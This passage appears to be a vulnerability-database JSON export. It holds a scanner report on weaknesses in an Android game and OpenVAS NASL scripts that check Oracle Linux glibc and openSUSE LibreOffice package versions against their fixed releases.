"450fad845cdf826ba5db5c1f6341b83d"}, {"severity": "notice", "name": "Suspicious files", "description": "Are you sure these files should be here?", "id": "0d60d8a9299926228ad46a9217231039"}, {"severity": "critical", "name": "WebView code execution", "description": "WebView 'addJavascriptInterface' could be used to control the host app with JavaScript bindings. Remote Code Execution (RCE) is possible.", "id": "83d6300273e4de6985c72c3e69a8da2f"}, {"severity": "critical", "name": "Dangerous filesystem permissions", "description": "Files created with these methods could be worldwide readable.", "id": "55ba80c38e5351a5d3e05e1102cab1c4"}, {"severity": "notice", "name": "Unsafe deleting", "description": "All items deleted with 'file.delete()' could be recovered.", "id": "3768d17130c8c2ef7a7bfe2a0ed6ac7b"}, {"severity": "notice", "name": "External URLs", "description": "Were do they point?", "id": "76215805a2f5fa09fb7fb8458312c899"}, {"severity": "notice", "name": "Corrupted files", "description": "Can't parse these files. Corrupted? Check manually.", "id": "ee9cb0bf4eacdc416be4f15a0b4a18b6"}, {"severity": "critical", "name": "Base64 encoded String", "description": "Base64 encoded string could include authentication credentials.", "id": "d667f1c71ac086e8d40cf5cc39778c44"}, {"severity": "medium", "name": "Exported components", "description": "Other applications could access the interfaces.", "id": "dd1e82d1a8eb9969e380e74c29065c6b"}, {"severity": "critical", "name": "Customized SSL", "description": "\n\t\t\tCheck certificate validation. Do not create or redefine X509Certificate class methods by yourself, if you don't understand risks. Use the existing API.\n\t\t\t", "id": "f997c2b26cd8863ba6f5bccf90da8e8a"}, {"severity": "medium", "name": "WebView JavaScript enabled", "description": "WebView 'setJavaScriptEnabled(true)' could be exploited during cross-site scripting attacks.", "id": "6f32b0d7e38ae46b0852a6dbb8206856"}, {"severity": "medium", "name": "SD-card access", "description": "SD-cards and other external storages have 'worldwide read' policy.", "id": "2f121b04e7a1e901e4d466b8102edf1a"}, {"severity": "medium", "name": "WebView files access", "description": "Control of WebView context allows to access local files.\n\t\t\t", "id": "354adf4ec6a643799131cedd9c36abc8"}], "release": "2013-07-18T00:00:00", "vendor": "Glu", "icon": "https://lh4.ggpht.com/pT-Ou4bOXuBlKfWNzB6tvVm_YJAQ9dtfr9c0TbD-wSddhTXFOWGOt4Ky_L606EfH35Fn=w300", "name": "BLOOD & GLORY", "link": "https://play.google.com/store/apps/details?id=com.glu.gladiator&hl=en", "store": "play", "apk": "COM.GLU.GLADIATOR.APK", "version": "1.1.6"}, "description": "HackApp vulnerability scanner discovered that application BLOOD & GLORY published at the 'play' market has multiple vulnerabilities.", "modified": "2016-04-01T09:41:38", "published": "2016-04-01T09:41:38", "id": "HACKAPP:COM.GLU.GLADIATOR.APK", "href": "https://hackapp.com/report/ded63372a6489e6ab9df72262719ae5b", "type": "hackapp", "title": "BLOOD & GLORY - Base64 encoded String, Customized SSL, Dangerous filesystem permissions vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-09-28T18:24:17", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2013-1605", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123527", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123527", "title": "Oracle Linux Local Check: ELSA-2013-1605", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1605.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123527\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:05:05 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1605\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1605 - glibc security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1605\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1605.html\");\n script_cve_id(\"CVE-2013-0242\", \"CVE-2013-1914\", \"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.132.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.132.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.132.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.132.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.12~1.132.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.132.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.132.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-11-19T13:03:50", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2014-09-16T00:00:00", "id": "OPENVAS:1361412562310850612", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850612", "title": "SuSE Update for LibreOffice openSUSE-SU-2014:1126-1 (LibreOffice)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1126_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for LibreOffice openSUSE-SU-2014:1126-1 (LibreOffice)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850612\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-16 06:02:46 +0200 (Tue, 16 Sep 2014)\");\n script_cve_id(\"CVE-2013-4156\", \"CVE-2014-3575\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SuSE Update for LibreOffice openSUSE-SU-2014:1126-1 (LibreOffice)\");\n script_tag(name:\"insight\", value:\"This update fixes memory corruption\nvulnerability in DOCM import and data exposure using crafted OLE objects.\");\n script_tag(name:\"affected\", value:\"LibreOffice on openSUSE 13.1, openSUSE 12.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1126_1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'LibreOffice'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.3|openSUSE13\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"libreoffice\", rpm:\"libreoffice~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base\", rpm:\"libreoffice-base~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-debuginfo\", rpm:\"libreoffice-base-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-mysql\", rpm:\"libreoffice-base-drivers-mysql~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-mysql-debuginfo\", rpm:\"libreoffice-base-drivers-mysql-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-postgresql\", rpm:\"libreoffice-base-drivers-postgresql~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-drivers-postgresql-debuginfo\", rpm:\"libreoffice-base-drivers-postgresql-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-base-extensions\", rpm:\"libreoffice-base-extensions~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-calc\", rpm:\"libreoffice-calc~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-calc-debuginfo\", rpm:\"libreoffice-calc-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-calc-extensions\", rpm:\"libreoffice-calc-extensions~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-debuginfo\", rpm:\"libreoffice-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-debugsource\", rpm:\"libreoffice-debugsource~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-draw\", rpm:\"libreoffice-draw~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-draw-extensions\", rpm:\"libreoffice-draw-extensions~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-draw-extensions-debuginfo\", rpm:\"libreoffice-draw-extensions-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-filters-optional\", rpm:\"libreoffice-filters-optional~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-filters-optional-debuginfo\", rpm:\"libreoffice-filters-optional-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-gnome\", rpm:\"libreoffice-gnome~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-gnome-debuginfo\", rpm:\"libreoffice-gnome-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-themes-prebuilt\", rpm:\"libreoffice-icon-themes-prebuilt~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress\", rpm:\"libreoffice-impress~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress-debuginfo\", rpm:\"libreoffice-impress-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress-extensions\", rpm:\"libreoffice-impress-extensions~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-impress-extensions-debuginfo\", rpm:\"libreoffice-impress-extensions-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde\", rpm:\"libreoffice-kde~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde-debuginfo\", rpm:\"libreoffice-kde-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde4\", rpm:\"libreoffice-kde4~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-kde4-debuginfo\", rpm:\"libreoffice-kde4-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-l10n-prebuilt\", rpm:\"libreoffice-l10n-prebuilt~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-mailmerge\", rpm:\"libreoffice-mailmerge~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-math\", rpm:\"libreoffice-math~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-math-debuginfo\", rpm:\"libreoffice-math-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-officebean\", rpm:\"libreoffice-officebean~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-officebean-debuginfo\", rpm:\"libreoffice-officebean-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-pyuno\", rpm:\"libreoffice-pyuno~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-pyuno-debuginfo\", rpm:\"libreoffice-pyuno-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-sdk\", rpm:\"libreoffice-sdk~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-sdk-debuginfo\", rpm:\"libreoffice-sdk-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-sdk-doc\", rpm:\"libreoffice-sdk-doc~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-writer\", rpm:\"libreoffice-writer~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-writer-debuginfo\", rpm:\"libreoffice-writer-debuginfo~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-writer-extensions\", rpm:\"libreoffice-writer-extensions~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-branding-upstream\", rpm:\"libreoffice-branding-upstream~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ast\", rpm:\"libreoffice-help-ast~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-bg\", rpm:\"libreoffice-help-bg~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ca\", rpm:\"libreoffice-help-ca~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-cs\", rpm:\"libreoffice-help-cs~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-da\", rpm:\"libreoffice-help-da~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-de\", rpm:\"libreoffice-help-de~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-el\", rpm:\"libreoffice-help-el~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-en-GB\", rpm:\"libreoffice-help-en-GB~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-en-US\", rpm:\"libreoffice-help-en-US~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-en-ZA\", rpm:\"libreoffice-help-en-ZA~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-es\", rpm:\"libreoffice-help-es~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-et\", rpm:\"libreoffice-help-et~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-eu\", rpm:\"libreoffice-help-eu~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-fi\", rpm:\"libreoffice-help-fi~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-fr\", rpm:\"libreoffice-help-fr~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-gl\", rpm:\"libreoffice-help-gl~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-gu-IN\", rpm:\"libreoffice-help-gu-IN~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-hi-IN\", rpm:\"libreoffice-help-hi-IN~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-hu\", rpm:\"libreoffice-help-hu~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-it\", rpm:\"libreoffice-help-it~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ja\", rpm:\"libreoffice-help-ja~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-km\", rpm:\"libreoffice-help-km~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ko\", rpm:\"libreoffice-help-ko~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-mk\", rpm:\"libreoffice-help-mk~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-nb\", rpm:\"libreoffice-help-nb~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-nl\", rpm:\"libreoffice-help-nl~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-pl\", rpm:\"libreoffice-help-pl~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-pt\", rpm:\"libreoffice-help-pt~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-pt-BR\", rpm:\"libreoffice-help-pt-BR~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-ru\", rpm:\"libreoffice-help-ru~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-sk\", rpm:\"libreoffice-help-sk~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-sl\", rpm:\"libreoffice-help-sl~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-sv\", rpm:\"libreoffice-help-sv~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-tr\", rpm:\"libreoffice-help-tr~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-vi\", rpm:\"libreoffice-help-vi~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-zh-CN\", rpm:\"libreoffice-help-zh-CN~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-help-zh-TW\", rpm:\"libreoffice-help-zh-TW~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-crystal\", rpm:\"libreoffice-icon-theme-crystal~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-galaxy\", rpm:\"libreoffice-icon-theme-galaxy~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libreoffice-icon-theme-hicontrast\", rpm:\"libreoffice-icon-theme-hicontrast~3.6.3.2.4~2.9.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 